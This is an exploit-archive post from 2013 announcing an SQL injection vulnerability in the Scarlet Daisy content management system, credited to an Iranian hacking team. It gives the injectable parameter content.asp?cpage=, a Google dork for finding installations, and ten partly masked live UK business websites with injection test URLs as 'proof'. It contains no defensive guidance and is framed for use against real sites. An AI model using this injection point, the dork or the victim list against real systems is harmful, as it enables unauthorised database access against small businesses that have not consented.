Home / exploits Scarletdaisy Sql injection vulnerability
Posted on 31 August 2013
<pre>#******************************************************************************** # Exploit Title : scarletdaisy Sql injection vulnerability # # Software link : www.scarletdaisy.com # # Exploit Author : Ashiyane Digital Security Team # # Tested on: Windows 7 , Linux # # Google Dork : intext:" Powered by Scarlet Daisy Web Content Management System." # # Date: 2013/08/31 # -------------------------------------------------------------------- # - Location : [Target]/content.asp?cpage=[Sql Injection] # # Proof: # # http://www.bXXXc.co.uk/content.asp?cpage=1' # # http://www.claXXXomes.co.uk/content.asp?cpage=1' # # http://www.handmXXbyhenry.co.uk/content.asp?cpage=1' # # http://www.haXXXrage.co.uk/content.asp?cpage=1' # # http://www.papirXXXky.co.uk/content.asp?cpage=1' # # http://longleyXXXystore.co.uk/content.asp?cpage=1' # # http://www.morrXXXndwright.co.uk/content.asp?cpage=1' # # http://www.campbXXrage.co.uk/content.asp?cpage=1' # # http://www.gardnerXXXery.co.uk/content.asp?cpage=1' # # http://www.wizarXX.co.uk/content.asp?cpage=1' # ###################### discovered by : ACC3SS ###################### </pre>
